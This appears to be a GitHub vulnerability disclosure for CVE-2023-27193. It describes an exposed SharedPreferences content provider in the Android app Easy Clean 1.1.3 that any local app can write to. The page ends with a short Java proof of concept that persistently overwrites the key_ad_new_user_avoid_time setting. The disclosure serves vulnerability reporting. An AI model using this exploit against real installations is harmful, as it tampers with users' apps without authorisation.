Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Escalation of Privileges exists in Easy Clean(CVE-2023-27193)

Vendor:DUALSPACE(http://www.dualspace.com/pc/en/products.html)

Affected product:Easy Clean (com.ludashi.xsuperclean)

Version:1.1.3

Download link:https://apkpure.com/cn/space-clean-super-cleaner/com.ludashi.xsuperclean

Description of the vulnerability for use in the CVE:An issue found in DUALSPACE v.1.1.3 allows a local attacker to gain privileges via the key_ad_new_user_avoid_time field.

Additional information:The app is a mobile clean app, which can free up storage space. Upon opening, the app loads the SharedPreference files into memory and uses the data in some important functions. If a malicious app modifies important data in the SharedPreference files, the Easy Clean app will not behave properly when loading this data. This can cause security hazards, such as ad blocking (by modifying the key_ad_new_user_avoid_time field). Even worse, users cannot fix the security issue by rebooting victim devices, since the injected data is persistent in the SharedPreference files.

poc:

public void attack(){
    ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
    Uri uri = Uri.parse("content://com.ludashi.xsuperclean.util.pref.SharedPrefProvider");
    ContentValues contentValues = new ContentValues();
    contentValues.put("file_name","__default__");
    contentValues.put("type",4);
    contentValues.put("key","key_ad_new_user_avoid_time");
    contentValues.put("value","100000");
    contentResolver.update(uri,contentValues,null,null);
}